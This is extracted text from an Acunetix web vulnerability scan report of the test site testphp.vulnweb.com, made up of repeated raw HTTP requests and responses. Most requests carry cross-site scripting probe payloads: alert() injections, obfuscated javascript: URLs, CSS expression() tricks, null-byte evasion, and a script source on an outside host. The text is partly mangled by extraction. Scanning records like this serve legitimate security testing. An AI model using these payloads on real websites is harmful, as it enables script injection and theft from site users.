Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 125 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 158 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

58

Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=
Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 114 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 100 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28468345920991%29%3B%22%3E&submit=a dd%20message Response Acunetix Website Audit

59

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 121 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 72 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

60

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20m essage Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 108 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(469855922094))%3E& submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

61

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 87 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 84 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=alert(467985920807)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 87 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

62

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 95 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=alert(468015920807)%3B&submit=add%20 message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 87 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=>'>alert(467995920807)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close Acunetix Website Audit

63

/guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 136 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=>'>alert(469085921556)%3B&submit=add%20mess age Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request Acunetix Website Audit

64

POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 88 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=alert(469075921556)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 82 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

65

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=-->alert(469125921556)%3B&submit=add%20mes Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 76 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=alert(469105921556)%3B&submit=ad d%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

66

Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 108 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=email@somealert(469135921556)%3Bdomain.com& submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 111 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28469155921556%29%3B%22% 3E&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

67

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 96 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=alert(469115921556)%3B&submit=add%2 0message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 109 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text= &submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

68

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 108 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 69 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 105 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

69

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&su Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text="+src="http://testphp.acunetix.com/xss.js?468655921150">&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%00"'>alert(468705921150)%3B&submit=add%20messa ge Response Acunetix Website Audit

70

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 96 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(468985921283))%3E&submit=add%2 0message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=
alert(468675921150)%3B&submit=add%20messa ge Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

71

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%00'">alert(468695921150)%3B&submit=add%20messa ge Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/ Details Request GET /hpp/?pp=%00"'>alert(481675929237)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/ Details Request GET /hpp/?pp=%00'">alert(481665929237)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

72

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/ Details Request GET /hpp/?pp=>">alert(481385929129)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=& pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=<%00script>alert(541875967426)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28541755967314%29%3B%22%3 E&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

74

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=>">alert(541695967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=alert(541675967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 